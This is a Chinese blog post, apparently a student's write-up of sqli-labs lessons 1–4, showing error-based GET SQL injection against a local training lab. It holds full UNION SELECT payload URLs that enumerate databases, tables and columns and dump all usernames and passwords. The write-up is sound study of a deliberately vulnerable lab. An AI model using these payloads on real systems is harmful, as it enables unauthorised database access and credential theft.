<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="sqlilab的第一题（基于错误的GET单引号字符型注入）什么是sql注入　　SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlilab1-4">
<meta property="og:url" content="http://example.com/2021/10/12/sqlilab1-4/index.html">
<meta property="og:site_name" content="Bai">
<meta property="og:description" content="sqlilab的第一题（基于错误的GET单引号字符型注入）什么是sql注入　　SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="d:/博客/source/img/b1.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012222641068.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012222857912.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012223103655.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012223203726.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012223755050.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012224020829.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012224105268.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012224248458.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012224402868.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012231732881.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012232117447.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012233416153.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012233847019.png">
<meta property="og:image" content="c:/Users/夜风/AppData/Roaming/Typora/typora-user-images/image-20211012234032297.png">
<meta property="article:published_time" content="2021-10-12T14:17:34.000Z">
<meta property="article:modified_time" content="2021-10-16T08:24:57.463Z">
<meta property="article:author" content="JIE">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:/博客/source/img/b1.png">


<link rel="canonical" href="http://example.com/2021/10/12/sqlilab1-4/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/10/12/sqlilab1-4/","path":"2021/10/12/sqlilab1-4/","title":"sqlilab1-4"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sqlilab1-4 | Bai</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Bai" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Bai</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习的思考</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sqlilab%E7%9A%84%E7%AC%AC%E4%B8%80%E9%A2%98%EF%BC%88%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">sqlilab的第一题（基于错误的GET单引号字符型注入）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFsql%E6%B3%A8%E5%85%A5"><span class="nav-number">1.1.</span> <span class="nav-text">什么是sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlilab%E7%AC%AC%E4%B8%80%E9%A2%98%E5%81%9A%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.2.</span> <span class="nav-text">sqlilab第一题做题思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%81%9A%E9%A2%98%E8%BF%87%E7%A8%8B%E4%B8%AD%E7%9A%84%E5%90%84%E7%A7%8D%E7%9F%A5%E8%AF%86"><span class="nav-number">1.3.</span> <span class="nav-text">做题过程中的各种知识</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-2-GET-Error-based-Intiger-based-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E6%95%B4%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-3-GET-Error-based-Single-quotes-with-twist-string-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8F%98%E5%BD%A2%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text">Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-4-GET-Error-based-Double-Quotes-String-%EF%BC%88%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="nav-number">4.</span> <span class="nav-text">Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">JIE</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml">RSS</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/10/12/sqlilab1-4/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="JIE">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bai">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqlilab1-4
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-10-12 22:17:34" itemprop="dateCreated datePublished" datetime="2021-10-12T22:17:34+08:00">2021-10-12</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-10-16 16:24:57" itemprop="dateModified" datetime="2021-10-16T16:24:57+08:00">2021-10-16</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="sqlilab的第一题（基于错误的GET单引号字符型注入）"><a href="#sqlilab的第一题（基于错误的GET单引号字符型注入）" class="headerlink" title="sqlilab的第一题（基于错误的GET单引号字符型注入）"></a>sqlilab的第一题（基于错误的GET单引号字符型注入）</h2><h3 id="什么是sql注入"><a href="#什么是sql注入" class="headerlink" title="什么是sql注入"></a>什么是sql注入</h3><p>　　SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库</p>
<span id="more"></span>

<p><strong>SQL注入攻击的总体思路</strong>　</p>
<p>　　1：寻找到SQL注入的位置</p>
<p>　　2：判断服务器类型和后台数据库类型</p>
<p>　　3：针对不同的服务器和数据库特点进行SQL注入攻击</p>
<h3 id="sqlilab第一题做题思路"><a href="#sqlilab第一题做题思路" class="headerlink" title="sqlilab第一题做题思路"></a>sqlilab第一题做题思路</h3><p>首先</p>
<p><img src="D:\博客\source\img\b1.png"></p>
<p>1.我根据题目提示，输入<code>http://127.0.0.1/sqli-labs-master/Less-1/?id=1</code>显示正常<img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012222641068.png" alt="image-20211012222641068"></p>
<p>2.加个单引号看看，<code>http://127.0.0.1/sqli-labs-master/Less-1/?id=1&#39;</code>显示出错</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012222857912.png" alt="image-20211012222857912"></p>
<p>3后通过<code>http://127.0.0.1/sqli-labs-master/Less-1/?id=1 and 1=2</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012223103655.png" alt="image-20211012223103655"></p>
<p><code>http://127.0.0.1/sqli-labs-master/Less-1/?id=1&#39; and &#39;1&#39; = &#39;2</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012223203726.png" alt="image-20211012223203726"></p>
<p>可以得知给sql注入为单引号字符型注入</p>
<p>4.现在可以构造语句，来获得mysql中的数据</p>
<p>首先先了解相关的数据库知识</p>
<p>information_schema，系统数据库，包含所有数据库相关信息。</p>
<p>information_schema.schemata中schema_name列，字段为所有数据库名称。</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012223755050.png" alt="image-20211012223755050"></p>
<p>information_schema.tables中table_name列对应数据库所有表名，其中table_schema列是所有数据库名。</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012224020829.png" alt="image-20211012224020829"></p>
<p>information_schema.columns中，column_name列对应所有列名，其中table_schema列也对应所有数据库名，table_name列也对应所有表名。</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012224105268.png" alt="image-20211012224105268"></p>
<ol>
<li>使用order by查列数，order by语法为：ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],… 此处以数字1,2,3…指定以某一列为key进行排序，通过尝试得出列数,得出列数为3。</li>
</ol>
<ul>
<li>order by 3时，<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; order by 3 --+</code>，正常：</li>
</ul>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012224248458.png" alt="image-20211012224248458"></p>
<p>order by 4时，<code>http://localhost:8088/sqlilabs/Less-1/?id=1&#39; order by 4 --+</code>，错误</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012224402868.png" alt="image-20211012224402868"></p>
<p>由此我可以得出给数据库有三列</p>
<p>6.接着进行联合注入，通过回显爆出表名，列名，字段，用户名和密码。</p>
<p>7.爆数据库名:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(schema_name),3 from information_schema.schemata --+</code></p>
<p>（为什么id = -1，是因为当id = -1时查询为假就会导致前面的查询结构为空集，这样才会导致后面的查询结果显示出来）（id = 0或其他的都行，只要让前面的查询为空集就行）</p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012231732881.png" alt="image-20211012231732881"></p>
<p>显示出当前数据库名<code>http://127.0.0.1/sqli-labs-master/Less-1/?id=-1&#39; union select 1,2,database() --+</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012232117447.png" alt="image-20211012232117447"></p>
<p>爆当前security数据库的表:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;security&#39;--+</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012233416153.png" alt="image-20211012233416153"></p>
<p>爆user表的列:<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#39;users&#39; --+</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012233847019.png" alt="image-20211012233847019"></p>
<p>爆所有用户名和密码: <code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(concat_ws(&#39;:&#39;,username,password)),3 from users --+</code></p>
<p>或<code>http://localhost:8088/sqlilabs/Less-1/?id=-1&#39; union select 1,group_concat(username),group_concat(password) from users --+</code></p>
<p><img src="C:\Users\夜风\AppData\Roaming\Typora\typora-user-images\image-20211012234032297.png" alt="image-20211012234032297"></p>
<p>结束</p>
<h3 id="做题过程中的各种知识"><a href="#做题过程中的各种知识" class="headerlink" title="做题过程中的各种知识"></a>做题过程中的各种知识</h3><ol>
<li>在mysql数据库中，单行注释有<code>#</code>和<code>--</code>，在实际操作中<code>#</code>号一般用<code>%23</code>来表示。而<code>--</code>则用<code>--+</code>来表示。因为在URL中，如果在最后加上<code>--</code> ，浏览器在发送请求的时候会把URL末尾的空格舍去，而用<code>--+</code>代替<code>--</code>，原因是<code>+</code>在URL被URL编码后会变成空格。</li>
<li>与数据库相关的内容：</li>
</ol>
<ul>
<li>information_schema，系统数据库，包含所有数据库相关信息。</li>
<li>information_schema.schemata中schema_name列，字段为所有数据库名称。</li>
<li>information_schema.tables中table_name列对应数据库所有表名，其中table_schema列是所有数据库名。</li>
<li>information_schema.columns中，column_name列对应所有列名，其中table_schema列也对应所有数据库名，table_name列也对应所有表名。</li>
</ul>
<ol>
<li>联合查询时需要将前面的查询结果限定为空集，后面的查询结果才能显示出来。</li>
<li><a target="_blank" rel="noopener" href="https://links.jianshu.com/go?to=https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc">concat(),concat_ws()与及group_concat()的用法</a></li>
</ol>
<h2 id="Less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><a href="#Less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入" class="headerlink" title="Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)"></a>Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)</h2><p>从开始通过前面的办法判断出sql注入为数字型注入</p>
<p>其他与前面一样</p>
<h2 id="Less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><a href="#Less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入" class="headerlink" title="Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)"></a>Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</h2><p>输入单引号，根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了，猜想一下咱们输入1在数据库语句中的位置，形如select … from … where id=(‘1’) …，在第一题中id=1‘的后面单引号加上），其它保持不变就行了，不再赘述。</p>
<h2 id="Less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）"><a href="#Less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）" class="headerlink" title="Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）"></a>Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</h2><p>输入单引号，页面无任何变化，</p>
<p>输入双引号，页面报错，</p>
<p>根据报错信息判断出咱们输入的内容被放到一队双引号和圆括号中，</p>
<p>猜想一下：select … from … where id=(”1”) …，把第一题中1后面的引号换成双引号加）就可以了。</p>
<p>不再赘述。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/10/07/php%E7%9A%84%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" rel="prev" title="php的正则表达式">
                  <i class="fa fa-chevron-left"></i> php的正则表达式
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/10/16/sql-labs%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" rel="next" title="sql-labs报错注入">
                  sql-labs报错注入 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">JIE</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
